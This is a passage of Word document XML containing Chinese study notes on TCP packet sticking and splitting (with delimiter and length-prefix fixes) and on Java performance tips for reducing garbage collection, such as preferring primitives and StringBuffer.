          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：本身作为无连接的不可靠的传输协议（适合频繁发送较小的数据包），他不会对数据包进行合并发送（也就没有</w:t>
      </w:r>
      <w:r w:rsidR="00E13436" w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Nagle</w:t>
      </w:r>
      <w:r w:rsidR="00E13436" w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>算法之说了），他直接是一端发送什么数据，直接就发出去了，既然他不会对数据合并，每一个数据包都是完整的（数据</w:t>
      </w:r>
      <w:r w:rsidR="00E13436" w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>+UDP</w:t>
      </w:r>
      <w:r w:rsidR="00E13436" w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>头</w:t>
      </w:r>
      <w:r w:rsidR="00E13436" w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>+IP</w:t>
      </w:r>
      <w:r w:rsidR="00E13436" w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>头等等发一次数据封装一次）也就没有粘包一说了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E13436" w:rsidRPr="00E13436" w:rsidRDefault="00E13436" w:rsidP="00E13436">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>分包产生的原因就简单的多：可能是</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>分片传输导致的，也可能是传输过程中丢失部分包导致出现的半包，还有可能就是一个包可能被分成了两次传输，在取数据的时候，先取到了一部分（还可能与接收的缓冲区大小有关系），总之就是一个数据包被分成了多次接收。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E13436" w:rsidRPr="00E13436" w:rsidRDefault="00E13436" w:rsidP="00E13436">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>解决办法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E13436" w:rsidRPr="00E13436" w:rsidRDefault="00E13436" w:rsidP="00E13436">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>粘包与分包的处理方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E13436" w:rsidRPr="00E13436" w:rsidRDefault="00E13436" w:rsidP="00E13436">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>我根据现有的一些开源资料做了如下总结（常用的解决方案）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E13436" w:rsidRPr="00E13436" w:rsidRDefault="00E13436" w:rsidP="00E13436">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD44D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>一个是采用分隔符的方式</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，即我们在封装要传输的数据包的时候，采用固定的符号作为结尾符（数据中不能含结尾符），这样我们接收到数据后，如果出现结尾标识，即人为的将粘包分开，如果一个包中没有出现结尾符，认为出现了分包，则等待下个包中出现后</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>组合成一个完整的数据包，这种方式适合于文本传输的数据，如采用</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/r/n</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>之类的分隔符；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E13436" w:rsidRPr="00E13436" w:rsidRDefault="00E13436" w:rsidP="00E13436">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD44D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>另一种是采用在数据包中添加长度的方式，即在数据包中的固定位置封装数据包的长度信息（或可计算数据包总长度的信息），服务器接收到数据后，先是解析包长度</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，然后根据包长度截取数据包（此种方式常出现于自定义协议中），但是有个小问题就是如果客户端第一个数据包数据长度封装的有错误，那么很可能就会导致后面接收到的所有数据包都解析出错（由于</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>建立连接后流式传输机制），只有客户端关闭连接后重新打开才可以消除此问题，我在处理这个问题的时候对数据长度做了校验，会适时的对接收到的有问题的包进行人为的丢弃处理（客户端有自动重发机制，故而在应用层不会导致数据的不完整性）；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00526875" w:rsidRPr="00526875" w:rsidRDefault="00E13436" w:rsidP="00E13436">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>另一种不建议的方式是</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>采用短连接处理粘包（这个得根据需要来，所以不建议）；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC002F" w:rsidRPr="00F41A4C" w:rsidRDefault="00DC002F" w:rsidP="00DC002F">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>优化方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC002F" w:rsidRDefault="00DC002F" w:rsidP="00DC002F">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD174F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>编写性能高效的</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD174F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD174F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD174F">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD174F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>根据</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD174F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>GC</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD174F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的工作原理，我们可以通过一些技巧和方式，让</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD174F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>GC</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD174F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>运行更加有效率，更加符合应用程序的要求。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC002F" w:rsidRPr="00C02C79" w:rsidRDefault="00DC002F" w:rsidP="00DC002F">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(1)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02C79">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>避免对象创建和</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02C79">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>GC</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02C79">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC002F" w:rsidRDefault="00DC002F" w:rsidP="00DC002F">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>只要有可能，应该避免创建对象，防止调用构造函数带来的相关性能成本，以及在对象结束其生命周期时进行垃圾收集所带来的成本。考虑以下这些准则：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>只要有可能，就使用基本变量类型，而不使用对象类型。例</w:t>
      </w:r>
      <w:r w:rsidRPr="00F67FDD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>如，使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F67FDD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F67FDD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，而不使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F67FDD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Integer</w:t>
      </w:r>
      <w:r w:rsidRPr="00F67FDD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidRPr="00F67FDD">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F67FDD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>缓存那些频繁使用的寿命短的对象，避免一遍又一遍地重复创建相同的对象，并因此加重垃圾收集的负担；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在处理字符串时，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> StringBuffer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>而不使用字符串</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>进行连接操作，因为字符串对象具有不可变的特性，并且需要创建额外的字符串对象以完成相应的操作，而这些对象最终必须经历</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
